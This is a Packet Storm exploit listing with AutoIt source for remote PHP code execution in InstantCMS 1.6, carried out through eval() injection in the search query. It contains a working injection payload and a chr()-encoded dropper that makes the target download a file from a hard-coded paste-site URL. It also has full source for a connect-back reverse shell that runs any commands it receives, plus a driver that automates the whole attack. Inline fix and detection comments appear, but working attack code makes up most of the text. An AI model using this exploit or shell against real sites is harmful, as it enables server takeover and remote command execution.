InstantCMS 1.6 Code Execution

2013-06-26T00:00:00
ID PACKETSTORM:122176
Type packetstorm
Reporter Akastep
Modified 2013-06-26T00:00:00

Description

                                        
                                            `#NoTrayIcon  
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****  
#AutoIt3Wrapper_Outfile=exploit.exe  
#AutoIt3Wrapper_UseUpx=n  
#AutoIt3Wrapper_Change2CUI=y  
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****  
#include <Inet.au3>  
#include <String.au3>  
  
#cs  
  
Demo vid: http://youtu.be/j_RIPh-nYpY  
Print Screen: http://s34-temporary-files.radikal.ru/a9d69c791f054e7f9c9bd469fc0b43fd/-929206895.png  
  
Download: http://www.instantcms.ru/load/url=/download/instantCMS_20100515_v1.6.2.zip  
  
Or:  
  
http://www.instantcms.ru/download.html  
  
Dork: InstantCMS © 2007-2010  
  
In the wild I also found 1.7 installs that are vulnerable.  
<?php  
//instantCMS_20100515_v1.6.2.zip/components/search/frontend.php  
/*********************************************************************************************/  
// //  
// InstantCMS v1.6 (c) 2010 FREEWARE //  
// http://www.instantcms.ru/, info@instantcms.ru //  
// //  
// written by Vladimir E. Obukhov, 2007-2010 //  
// //  
/*********************************************************************************************/  
  
  
  
  
// SNIP//  
  
// $query is the request's search text. For look=phrase it is wrapped in
// backslash-escaped double quotes and appended to $against. (Whatever happens
// to $query/$against before this point is cut from the excerpt, so it is not
// visible here whether any escaping is applied upstream.)
if ($look == 'phrase'){  
$against .= '\"'.$query.'\"';  
}  
  
//RUN SEARCH PROCESSORS  
//get list of components and look for search processor in component folder  
// The component list comes from the database; this SQL carries no request input.
$sql = "SELECT link FROM cms_components";  
$rs = $inDB->query($sql) ;  
if ($inDB->num_rows($rs)){  
while ($component = $inDB->fetch_assoc($rs)){  
// Include path is built from the DB value under DOCUMENT_ROOT without any
// normalisation visible here; the name is only checked against $cfg['comp'].
$spfile = $_SERVER['DOCUMENT_ROOT'].'/components/'.$component['link'].'/psearch.php';  
if (file_exists($spfile)){  
if (in_array($component['link'], $cfg['comp'])){  
include $spfile;  
// VULNERABLE: the source handed to eval() embeds $against, $look and $mode
// inside double-quoted string literals with no escaping. $against carries the
// request's `query` parameter (and $look the `look` parameter), so a value
// such as ${...} is interpolated by PHP and executes as code; unless quotes
// are escaped upstream (not visible in this excerpt) a literal `"` would also
// close the string and let raw PHP follow.
// Fix: do not re-parse data as code -- call the processor directly and pass
// the values as ordinary PHP variables, after whitelisting the function name:
//   $fn = 'search_'.$component['link'];
//   if (preg_match('/^[a-z0-9_]+$/i', $component['link']) && function_exists($fn)) {
//       $fn($against, $look, $mode);
//   }
eval('search_'.$component['link'].'("'.$against.'", "'.$look.'", "'.$mode.'");');  
}  
}  
}  
}  
  
  
// EOF SNIP //  
  
Notice the eval() construct on the last line of the snippet: $against (built from the request's `query` parameter) and $look are pasted unescaped into double-quoted string literals inside the code that eval() then executes.  
  
Exploitation:  
Payload: ${echo phpinfo()} -- PHP interpolates `${...}` inside the double-quoted literal that the eval()'d code wraps around the query, so the expression runs on the server.  
  
site.tld/index.php?view=search&query=${echo phpinfo()}&look=allwords  
  
Dropping a shell works the same way (see below).  
  
=======================================================================================  
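<?php  
  
/*  
  
Simple Payload generator  
  
Prints the shell URL as a chain of chr() calls, e.g. "chr(104).chr(116)...",  
so the value can be placed in the GET parameter without any quote characters.  
Paste the output where PAYLOAD2 appears in the file_put_contents() payload  
(and run it again on the destination path for PAYLOAD1).  
  
*/  
  
/**
 * Encode every byte of $s as a PHP chr() call, joined with '.'.
 *
 * @param string $s  arbitrary byte string
 * @return string    'chr(N).chr(N)...' or '' when $s is empty
 */
function chr_encode($s)  
{  
    $parts = array();  
    $len = strlen($s);  
    for ($i = 0; $i < $len; $i++) {  
        $parts[] = 'chr(' . ord($s[$i]) . ')';  
    }  
    return implode('.', $parts);  
}  
  
// Shell URL. This must be a server under YOUR control: the target downloads  
// and writes to disk whatever this URL serves at exploitation time.  
$str = 'http://search.tld/andfind.txt';  
  
echo '<pre>' . PHP_EOL;  
echo chr_encode($str);  
?>  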
  
=======================================================================================  
  
Then drop the shell with the payload below, where PAYLOAD1 is the chr()-encoded destination path under the web root and PAYLOAD2 the chr()-encoded URL the target fetches the shell from (both produced by the generator above). The target needs allow_url_fopen enabled for file_get_contents() to read an http:// URL.  
  
${echo file_put_contents(PAYLOAD1,file_get_contents(PAYLOAD2))}  
  
  
  
The dropped file is the following connect-back shell (it takes the port from the digits of the requesting User-Agent header and connects back to the requester's IP address):  
  
  
<?php  
// Connect-back shell, dropped as includes/a.php by the exploit. It connects to
// the IP address that requested this page, on the port spelled out by the
// digits of that request's User-Agent, and runs every chunk it receives
// through the system shell via the backtick operator.
// Detection / IR notes: a request for /includes/a.php whose User-Agent is a bare
// number, an outbound TCP connection from the web server back to that client,
// and the strings '<!-- Welcome BH -->' and 'W00T: ' in the response/stream.
// Notices are silenced; $hello below is appended to before it is ever assigned.
error_reporting(0);  
// Keep the command loop alive beyond max_execution_time.
set_time_limit(0);  
// Connect back to whoever requested the page.
$ip=trim((string)$_SERVER['REMOTE_ADDR']);  
// Port = the digits of the User-Agent header; everything else is stripped.
$port=preg_replace('/[^0-9]/i','',(string)$_SERVER['HTTP_USER_AGENT']);  
// No digits in the UA (e.g. the exploit's existence check with a browser UA):
// print the marker the driver looks for and stop without connecting anywhere.
if (empty($port)){ die('<!-- Welcome BH -->');}  
// Neither socket_create() nor socket_connect() results are checked.
$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$responce=socket_connect($socket,$ip,$port);  
// Initial prompt sent to the listener.
$hello.=PHP_EOL . 'W00T: ';socket_write($socket,$hello,strlen($hello));  
// Each chunk read from the socket is executed verbatim as a shell command and
// its output sent back followed by the prompt; loop ends when the read fails.
while($alive=@socket_read($socket, 31337))  
{$responce=`$alive`;$responce.=PHP_EOL .'W00T: ';socket_write($socket,$responce,strlen($responce));}socket_close($socket);  
  
  
  
  
  
#ce  
  
  
; Usage text shown in a MsgBox when the argument count is wrong.
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld' & ' yournetcatport' & @CRLF  
; Browser-like User-Agent used for every request except the final trigger,
; where the User-Agent carries the listener port instead.
$fakeua='Mozilla/ (compatible; MSIE ; Windows NT ; WOW Trident/) ';  
; Vulnerable endpoint. The literal 'Shoutz)' is a placeholder that StringReplace()
; swaps for the PHP payload before each request.
$vulnurl='/index.php?view=search&query=Shoutz)&look=allwords';  
; Dropper payload. The chr() chains decode to:
;   first argument  -> includes/a.php                           (where the shell is written, under the CMS web root)
;   second argument -> http://www.heypasteit.com/download/0V18  (where the target fetches the shell FROM)
; NOTE(review): the source is a hard-coded third-party paste URL, not "a server under your
; control" as the generator's comment says -- the target writes to disk whatever that URL
; serves at run time, and the fetch needs allow_url_fopen=On on the target.
$kissyou='${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}';  
; Marker the dropped shell prints when requested without a numeric User-Agent;
; used to confirm the drop succeeded.
$pissagainst_wind='<!-- Welcome BH -->';  
; Separator line for console output.
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;  
#cs  
ConsoleWrite('debug ' & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'));  
exit;  
#ce  
  
  
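ConsoleWrite($triptrop & '# instantCMS_20100515_v1.6.2 PHP Code Execution Exploit # ' & @CRLF & _  
'# *Via Reverse Shell* #' & @CRLF & _  
'# Usage: ' & @ScriptName & ' http://site.tld' & ' yournetcatport #' & @CRLF & _  
'# /AkaStep #' & $triptrop)  

; Exactly two arguments are expected: the target base URL and the listener port.
If $CmdLine[0] <> 2 Then  
MsgBox(64, "", $msg_usage)  
Exit  
EndIf  

; Target base URL. Every request path below starts with '/', so a trailing slash
; would produce 'http://site.tld//index.php' -- strip it.
$rsite = $CmdLine[1]  
If StringRight($rsite, 1) = '/' Then $rsite = StringTrimRight($rsite, 1)  

; The listener port travels in the User-Agent of the final request. The dropped
; shell keeps only the digits of that header and exits without connecting if none
; are left, so reject anything that is not a plain port number here instead of
; failing silently at the last step.
$PayloadUA = $CmdLine[2]  
If Not StringIsDigit($PayloadUA) Or Int($PayloadUA) < 1 Or Int($PayloadUA) > 65535 Then  
ConsoleWrite($triptrop & '[-] Port must be a number between 1 and 65535 [-]' & $triptrop)  
Exit  
EndIf  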
  
  
ConsoleWrite($triptrop & '[+] Verifying vulnerability [+]' & $triptrop)  

; Probe: inject ${echo phpinfo()} through the search query and look for a string
; that only a rendered phpinfo() page contains. This executes phpinfo() on the
; target (noisy in logs) and only proves code execution -- it does not check
; whether allow_url_fopen is actually On, which the remote file_get_contents()
; drop later on depends on.
HttpSetUserAgent($fakeua)  
$probe = _INetGetSource($rsite & StringReplace($vulnurl, 'Shoutz)', '${echo phpinfo()}'), True)  

If Not StringInStr($probe, 'allow_url_fopen') Then  
ConsoleWrite($triptrop & '[-] Sorry Dude:( Not vulnerable:( [-]' & $triptrop)  
Exit  
EndIf  

ConsoleWrite($triptrop & '[+] WoHoo! Remote Site Is vulnerable! [+]' & $triptrop)  
  
#cs  
  
Time to get the reverse shell!  
First we drop our shell as includes/a.php (the target fetches it from the URL encoded in $kissyou).  
Then we check that the dropped file exists by requesting it and looking for its marker.  
If it exists we trigger it so that it connects back to us.  
  
  
${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}&look=allwords  
  
  
  
#ce  
  
  
#cs  
EXPLOITING!  
#ce  
; Fire the dropper: the target fetches the shell over HTTP and writes it to
; includes/a.php. InetGet's result is not inspected; the drop is confirmed by the
; existence check that follows.
HttpSetUserAgent($fakeua)  
$dropurl = $rsite & StringReplace($vulnurl, 'Shoutz)', $kissyou)  
InetGet($dropurl, '', 1)  

; Give the target a moment to finish the remote fetch before probing for the file.
Sleep(Random(1500, 3000, 1))  
  
  
#cs  
Now checking for existence of our dropped shell.  
#ce  
  
  
; Request the dropped file with the browser User-Agent (no digits): the shell then
; prints its marker and exits instead of connecting anywhere.
HttpSetUserAgent($fakeua)  
$shellpage = _INetGetSource($rsite & '/includes/a.php', True)  

If Not StringInStr($shellpage, $pissagainst_wind) Then  
ConsoleWrite($triptrop & "[+] Can't find Shell! Try to exploit Manually! [+]" & $triptrop)  
Exit  
EndIf  

ConsoleWrite($triptrop & '[+] Seems We Are going To Travel xD! [+]' & $triptrop)  
  
  
  
#cs  
And Finally Getting Reverse Shell  
#ce  
  
; Trigger the connect-back: the User-Agent now carries the listener port. The
; request is issued in the background (InetGet's fourth argument) so this script
; is not held up by a request the shell never finishes answering.
HttpSetUserAgent($PayloadUA)  
$shellurl = $rsite & '/includes/a.php'  
InetGet($shellurl, '', 1, 1)  

ConsoleWrite($triptrop & "[+] Happy Travel! [+]" & $triptrop)  
Exit  
  
  
  
#cs  
  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
itsecuritysolutions.org  
waraxe.us  
exploit-db.com  
insecurety.net  
  
================================================  
  
/AkaStep  
  
  
  
  
  
#ce  
  
`